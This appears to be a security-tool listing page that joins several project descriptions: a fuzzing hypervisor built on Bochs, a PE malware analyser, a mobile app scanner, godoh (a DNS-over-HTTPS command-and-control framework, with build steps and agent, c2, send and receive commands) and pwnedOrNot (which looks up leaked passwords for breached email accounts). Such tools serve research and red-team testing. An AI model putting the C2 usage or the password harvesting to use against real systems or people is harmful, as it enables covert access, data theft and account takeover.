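Addresses that fall outside every listed module are kept under their absolute value rather than dropped, so a hit in unlisted code (JIT pages, a driver the enlightenment missed) still shows up in `per_module()` as `<unknown>` instead of silently vanishing from the feedback signal.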
For Windows targets, symbols will be dynamically downloaded from the symbol store using your _NT_SYMBOL_PATH and using symchk . Without symchk in the path it will silently fail. With symbols a nice human-readable version of coverage can be saved for viewing. Further, with private symbols the coverage can be converted to source:line such that source code can be colored. Tests Okay there aren’t really tests, but there’s bochservisor_test which is a tiny OS that just verifies that everything boots with the hypervisor. There’s then bochservisor_test_real which is a configuration I use for things like Windows/Linux. This is the one that will probably get updated most frequently. Architecture Basics This codebase introduces a small amount of code to Bochs to allow modular access to CPU context, guest physical to their backing memory, and stepping both device and CPU state. The main code you want to look at is in lib.rs in the bochservisor Rust project. CPU Loop In the main CPU loop of Bochs we instead LoadLibrary() to load the bochservisor DLL. This DLL exports one routine which is the Rust CPU loop which will be invoked. Bochs will pass a structure to this bochs_cpu_loop routine which will contain function pointers to get information from Bochs and to step the device and CPU state in it. MMIO / I/O When MMIO or I/O occurs, the hypervisor will exit with a memory fault or an I/O instruction fault. While WHVP does provide an emulation API it’s really lacking and not sufficient. Rather we use Bochs which is already there and step through a few instructions. By keeping the hypervisor CPU state in sync with Bochs we can dynamically switch between hypervisor and emulation at any time (or at least we should be able to). This means that the full hypervisor state is always in sync with Bochs and thus things like Bochs snapshots should work as normal and could be booted without the hypervisor (except maybe some CPUID state which needs to be stored in the snapshot info). 
When MMIO or I/O occurs we run a certain number of instructions under emulation rather than emulating just one. Due to the API cost of entering and exiting the hypervisor, and the likelihood that similar MMIO operations occur next to each other, we step a few instructions. This allows us to reduce the overhead of the API and reduces the VMEXIT frequency. This is a tunable number, but what is in the codebase is likely there for a reason.

Interrupts
Interrupts we handle in a really interesting way. Rather than scheduling interrupts to be delivered to the hypervisor, we handle all interrupts in Bochs emulation itself. Things like exceptions that happen entirely inside of the hypervisor are of course not handled by Bochs. This also gives us features that WHVP doesn't support, like SMIs (for SMM). Bochs's BIOS uses SMM by default, and without SMI support a custom BIOS needs to be built. I did this in my first iteration of this... do not recommend.

Future
This project is designed for fuzzing, however it's so new (only a few days old) that it has none of these features yet. Some of the first things to come will be:

Evaluate threading
We could potentially have the Bochs device code running in one thread in a real-time loop, and another thread running the hypervisor. Async events would be communicated via IPC and would allow the devices to be updated while execution is in the guest. Currently everything happens in one thread, which means the hypervisor must exit on an interval to make sure we can step devices. It's as if we wrote our own scheduler. Threading might be a bit faster, but it also increases complexity and adds the potential for race issues. It's hard to say if this will ever happen.

Code coverage
I'm not sure which method I'll use to gather code coverage, but there will be at least a few options, spanning from accurate to fast, etc. All these coverage mechanisms will be system level and will not require source or symbols of targets.
Guest enlightenment
Parsing of OS structures to get primitive information such as process listings, module lists, etc. This would then be used to query PDBs to get symbol information.

Crash reporting
Reporting crashes in some meaningful way. Ideally minidumps would be nice, as they could be loaded up and processed in WinDbg. This might be fairly easy as DMPs are just physical memory and processor context, which we already have.

Crash deduping / root causing
I've got some fun techniques for root causing bugs which have been historically successful. I plan to bring those here.

Fast resets
By tracking dirty pages and restoring only modified things we should be able to reset VMs very quickly. This gives us the ability to fuzz at maximum speed on all cores of a target system. This is similar to what I did in falkervisor, so it's already thought out and designed. It just needs to be ported here.

falkervisor mode
Extremely fast fuzzing that cancels execution when MMIO or I/O occurs. This allows all the CPU time to be spent in the hypervisor with no emulation time. This has the downside of not supporting things like disk I/O during a fuzz case, but it's nice.

Philosophy
One of the core concepts of this project is absolute minimum modifications to Bochs. This allows us to keep the Bochs portion of this repo up to date. The goal is also to move as much code into Rust and DLLs as possible to make the system much more modular and safe. This will hopefully reduce the chances of making silly corruption bugs in the hypervisor itself, which would cause invalid fuzz results. Currently the hypervisor is a DLL and can be swapped out without changes to Bochs (unless the FFI API changes). Further changes to Bochs itself must be documented clearly, and I'll be making a document for that shortly to track the changes to Bochs which must be ported and re-evaluated with Bochs updates.

Download Applepie

An open source tool to perform malware static analysis on Portable Executables.

Installation
$ git clone https://github.com/Th3Hurrican3/PEpper/
$ cd PEpper
$ pip3 install -r requirements.txt
$ python3 pepper.py ./malware_dir

Screenshot (CSV output)

Features extracted
Suspicious entropy ratio
Suspicious name ratio
Suspicious code size
Suspicious debugging time-stamp
Number of exports
Number of anti-debugging calls
Number of virtual-machine detection calls
Number of suspicious API calls
Number of suspicious strings
Number of YARA rule matches
Number of URLs found
Number of IPs found
Cookie on the stack (GS) support
Control Flow Guard (CFG) support
Data Execution Prevention (DEP) support
Address Space Layout Randomization (ASLR) support
Structured Exception Handling (SEH) support
Thread Local Storage (TLS) support
Presence of manifest
Presence of version
Presence of digital certificate
Packer detection
VirusTotal database detection
Import hash

Notes
Can be run on a single PE or on multiple PEs (placed inside a directory)
Output will be saved (in the same directory as pepper.py) as output.csv
To use the VirusTotal scan, add your private key in the module called "virustotal.py" (Internet connection required)

Credits
Many thanks to those who indirectly helped me in this work, especially:
The LIEF project and its awesome library
PEstudio, a really amazing piece of software to analyze PEs
PEframe from guelfoweb, an incredibly widespread tool to perform static analysis on Portable Executable malware and malicious MS Office documents
The Yara-Rules project, which provides compiled signatures, classified and kept as up to date as possible

Download PEpper

godoh is a proof of concept Command and Control framework, written in Golang, that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google and Cloudflare, but it also has the ability to use traditional DNS.

Installation
All you would need are the godoh binaries themselves. Binaries are available for download from the releases page as part of tagged releases.

To build godoh from source, follow these steps:
Ensure you have dep installed (go get -v -u github.com/golang/dep/cmd/dep)
Clone this repository to your $GOPATH's src/ directory so that it is in sensepost/godoh
Run dep ensure to resolve dependencies
Run make key to generate a unique encryption key to use for communication
Use the go build tools, or run make to build the binaries in the build/ directory

Usage
$ godoh -h
A DNS (over-HTTPS) C2
Version: dev
By @leonjza from @sensepost

Usage:
  godoh [command]

Available Commands:
  agent       Connect as an Agent to the DoH C2
  c2          Starts the godoh C2 server
  help        Help about any command
  receive     Receive a file via DoH
  send        Send a file via DoH
  test        Test DNS communications

Flags:
  -d, --domain string     DNS Domain to use. (ie: example.com)
  -h, --help              help for godoh
  -p, --provider string   Preferred DNS provider to use. [possible: google, cloudflare, raw] (default "google")

Use "godoh [command] --help" for more information about a command.

Download goDoH

A static analysis tool for Android and iOS applications focusing on security issues outside the source code, such as resource strings, third party libraries and configuration files.

Requirements
Python 3 is required and you can find all required modules in the requirements.txt file. Only tested on Python 3.7 but should work on other 3.x releases. No plans for 2.x support at this time.

Installation
You can install this via PIP as follows:
pip install truegaze
truegaze

To download and run manually, do the following:
git clone https://github.com/nightwatchcybersecurity/truegaze.git
cd truegaze
pip install -r requirements.txt
python -m truegaze.cli

How to use
To list modules:
truegaze list

To scan an application:
truegaze scan test.apk
truegaze scan test.ipa

Sample output
Listing modules:
$ truegaze list
Total active plugins: 1
+----------------+------------------------------------------+---------+------+
| Name           | Description                              | Android | iOS  |
+----------------+------------------------------------------+---------+------+
| AdobeMobileSdk | Detection of incorrect SSL configuration | True    | True |
|                | in the Adobe Mobile SDK                  |         |      |
+----------------+------------------------------------------+---------+------+

Scanning an application:
$ truegaze scan ~/test.ipa
Identified as an iOS application via a manifest located at: Payload/IPAPatch-DummyApp.app/Info.plist
Scanning using the "AdobeMobileSdk" plugin
-- Found 1 configuration file(s)
-- Scanning "Payload/IPAPatch-DummyApp.app/Base.lproj/ADBMobileConfig.json'
---- FOUND: The ["analytics"]["ssl"] setting is missing or false - SSL is not being used
---- FOUND: The ["remotes"]["analytics.poi"] URL doesn't use SSL: http://assets.example.com/c234243g4g4rg.json
---- FOUND: The ["remotes"]["messages"] URL doesn't use SSL: http://assets.example.com/b34343443egerg.json
---- FOUND: A "templateurl" in ["messages"]["payload"] doesn't use SSL: http://my.server.com/?user={user.name}&zip={user.zip}&c16={%sdkver%}&c27=cln,{a.PrevSessionLength}
---- FOUND: A "templateurl" in ["messages"]["payload"] doesn't use SSL: http://my.43434server.com/?user={user.name}&zip={user.zip}&c16={%sdkver%}&c27=cln,{a.PrevSessionLength}
Done!

Display installed version:
$ truegaze version
Current version: v0.2

Structure
The application is command line and will consist of several modules that check for various vulnerabilities. Each module does its own scanning, and all results get printed to the command line.

Reporting bugs and feature requests
Please use the GitHub issue tracker to report issues or suggest features: https://github.com/nightwatchcybersecurity/truegaze
You can also send email to research /at/ nightwatchcybersecurity [dot] com

Wishlist
More unit test coverage for code that interacts with Click
Ability to extract additional files from online sources
Ability to check if a particular vulnerability is exploitable
Ability to produce JSON or XML output that can feed into other tools
More modules!

About the name
"True Gaze" or "Истинное Зрение" is a magical spell that reveals the invisible (from the book "Last Watch" by Sergei Lukyanenko).

Download Truegaze

OSINT Tool to Find Passwords for Compromised Email Accounts
pwnedOrNot uses the haveibeenpwned v2 API to test email accounts and tries to find the password in Pastebin dumps.

Featured
OSINT Collection Tools for Pastebin – Jake Creps

Get In Touch
Twitter
Telegram
Blog

Changelog

Features
haveibeenpwned offers a lot of information about the compromised email; some useful information is displayed by this script:
Name of Breach
Domain Name
Date of Breach
Fabrication status
Verification Status
Retirement status
Spam Status
And with all this information pwnedOrNot can easily find passwords for compromised emails if the dump is accessible and it contains the password.

Tested on
Kali Linux 2019.1
BlackArch Linux
Ubuntu 18.04
Kali Nethunter
Termux

Installation
Ubuntu / Kali Linux / Nethunter / Termux
git clone https://github.com/thewhiteh4t/pwnedOrNot.git
cd pwnedOrNot
pip3 install requests

BlackArch Linux
pacman -S pwnedornot

Updates
cd pwnedOrNot
git pull

Usage
python3 pwnedornot.py -h

usage: pwnedornot.py [-h] [-e EMAIL] [-f FILE] [-d DOMAIN] [-n] [-l] [-c CHECK]

optional arguments:
  -h, --help            show this help message and exit
  -e EMAIL, --email EMAIL
                        Email Address You Want to Test
  -f FILE, --file FILE  Load a File with Multiple Email Addresses
  -d DOMAIN, --domain DOMAIN
                        Filter Results by Domain Name
  -n, --nodumps         Only Check Breach Info and Skip Password Dumps
  -l, --list            Get List of all pwned Domains
  -c CHECK, --check CHECK
                        Check if your Domain is pwned

# Examples

# Check Single Email
python3 pwnedornot.py -e
#OR
python3 pwnedornot.py --email

# Check Multiple Emails from File
python3 pwnedornot.py -f
#OR
python3 pwnedornot.py --file

# Filter Result for a Domain Name [Ex : adobe.com]
python3 pwnedornot.py -e -d
#OR
python3 pwnedornot.py -f --domain

# Get only Breach Info, Skip Password Dumps
python3 pwnedornot.py -e -n
#OR
python3 pwnedornot.py -f --nodumps

# Get List of all Breached Domains
python3 pwnedornot.py -l
#OR
python3 pwnedornot.py --list

# Check if a Domain is Pwned
python3 pwnedornot.py -c
#OR
python3 pwnedornot.py --check

Demo

Download pwnedOrNot